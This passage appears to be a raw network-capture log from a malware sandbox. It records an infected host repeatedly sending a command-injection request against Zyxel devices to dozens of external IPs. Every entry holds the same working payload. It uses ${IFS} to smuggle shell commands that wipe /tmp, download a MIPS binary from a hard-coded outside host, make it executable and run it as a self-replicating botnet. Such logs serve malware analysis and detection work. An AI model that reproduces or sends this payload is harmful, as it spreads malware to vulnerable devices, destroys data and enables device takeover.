                                        Mar 31, 2024 09:22:29.711169004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8359192.168.2.234792285.106.204.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711214066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8360192.168.2.234568412.140.105.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711253881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8361192.168.2.2342618101.221.189.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711292982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8362192.168.2.2355496200.203.220.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711338043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8363192.168.2.2342222202.140.189.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711395979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8364192.168.2.235440299.46.15.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711443901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8365192.168.2.2357970222.166.201.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711481094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8366192.168.2.234791213.24.249.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711541891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8367192.168.2.2350514160.254.236.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711584091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8368192.168.2.233926032.90.110.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711652040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8369192.168.2.2347560176.50.17.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711683989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8370192.168.2.235832490.45.111.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711734056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8371192.168.2.2358550186.108.232.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711776018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8372192.168.2.2359462125.4.224.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711827993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8373192.168.2.2343872146.172.249.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711872101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8374192.168.2.2344324206.222.94.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711905956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8375192.168.2.2358006172.45.113.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.711977959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8376192.168.2.2353266213.244.140.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712018967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8377192.168.2.2334146155.40.93.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712075949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8378192.168.2.233278669.140.218.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712136984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8379192.168.2.233712696.192.132.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712188005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8380192.168.2.235495049.253.190.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712239027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8381192.168.2.2338044174.90.86.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712281942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8382192.168.2.2335856178.81.181.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712331057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8383192.168.2.234401054.153.253.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712368011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8384192.168.2.2346956169.131.110.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712408066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8385192.168.2.235147248.118.155.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712455988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8386192.168.2.2348390209.50.14.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712518930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8387192.168.2.235457618.104.77.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712557077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8388192.168.2.2343782119.188.236.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712604046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8389192.168.2.2357602102.201.151.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712652922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8390192.168.2.2347904162.59.98.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712687016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8391192.168.2.2343800133.222.102.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712733984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8392192.168.2.2355562145.203.185.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712788105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8393192.168.2.2345846110.244.101.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712826014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8394192.168.2.2352350144.237.24.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712866068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8395192.168.2.234233218.113.211.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712918997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8396192.168.2.235400625.33.7.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712956905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8397192.168.2.2338188116.227.217.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.712994099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8398192.168.2.2355164133.245.250.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.713042974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8399192.168.2.234723867.132.175.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.713088989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8400192.168.2.234734269.214.114.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.713129997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8401192.168.2.2356350150.172.208.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.713165045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8402192.168.2.235822487.196.240.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.713216066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8403192.168.2.234943058.238.204.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.713257074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8404192.168.2.2341192157.20.11.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.713290930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8405192.168.2.2359036151.76.123.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.713340044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8406192.168.2.2356888187.74.63.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.713373899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8407192.168.2.2334092144.136.67.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.713409901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8408192.168.2.235751472.179.98.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.713457108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8409192.168.2.2351826209.158.0.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.713500023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8410192.168.2.233456884.25.63.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.713553905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8411192.168.2.2350698148.130.148.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.713602066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8412192.168.2.235482268.93.1.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.713655949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8413192.168.2.2342970125.28.94.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.720454931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8414192.168.2.2338528173.21.207.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.720501900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8415192.168.2.2359044106.33.9.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.720539093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8416192.168.2.2359154109.221.195.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.720587969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8417192.168.2.2336442164.61.148.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.720632076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8418192.168.2.2337128222.94.5.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.720685005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8419192.168.2.23530528.112.199.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.720731974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8420192.168.2.2357612173.25.175.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.720765114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8421192.168.2.2351086200.237.136.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.720812082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8422192.168.2.2348626167.63.72.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.720864058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8423192.168.2.235338865.141.244.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.720921993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8424192.168.2.235027471.243.153.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.720972061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8425192.168.2.235035047.173.219.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:30.697571993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8426192.168.2.2334362113.35.26.149443
                                        TimestampBytes transferredDirectionData
